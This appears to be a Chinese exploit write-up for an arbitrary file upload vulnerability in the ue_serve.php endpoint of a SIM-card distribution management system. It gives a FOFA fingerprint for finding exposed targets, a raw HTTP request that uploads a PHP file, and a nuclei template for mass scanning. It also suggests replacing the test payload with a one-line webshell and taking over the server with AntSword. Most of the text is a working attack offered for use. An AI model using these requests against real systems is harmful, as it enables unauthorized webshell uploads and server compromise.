号卡极团分销管理系统 ue_serve.php 任意文件上传漏洞
fofa数据 icon_hash="-795291075"
复现poc
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 ------WebKitFormBoundarylkv1kpsZgzw2WC03 Content-Disposition: form-data; name="name" 1.php ------WebKitFormBoundarylkv1kpsZgzw2WC03 Content-Disposition: form-data; name="upfile"; filename="1.php" Content-Type: image/jpeg <?php phpinfo();?> ------WebKitFormBoundarylkv1kpsZgzw2WC03--
<?php phpinfo();?> 这个就是上传文件的代码,可以换成php一句话木马,然后利用蚁剑拿下web shell,然后...
批量上传脚本
nuclei-poc
id: haoka-upload
info:
name: haoka-upload
author: @sswcnet
severity: high
http:
- raw:
- |-
@timeout: 30s
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
Host: {{Hostname}}
Cookie: PHPSESSID=ecq4ucplk5n6e3ipihvktl103r
Sec-Ch-Ua: "Not;A=Brand";v="99", "Chromium";v="106"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 301
------WebKitFormBoundarylkv1kpsZgzw2WC03
Content-Disposition: form-data; name="name"
1.php
------WebKitFormBoundarylkv1kpsZgzw2WC03
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundarylkv1kpsZgzw2WC03--
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- SUCCESS
condition: and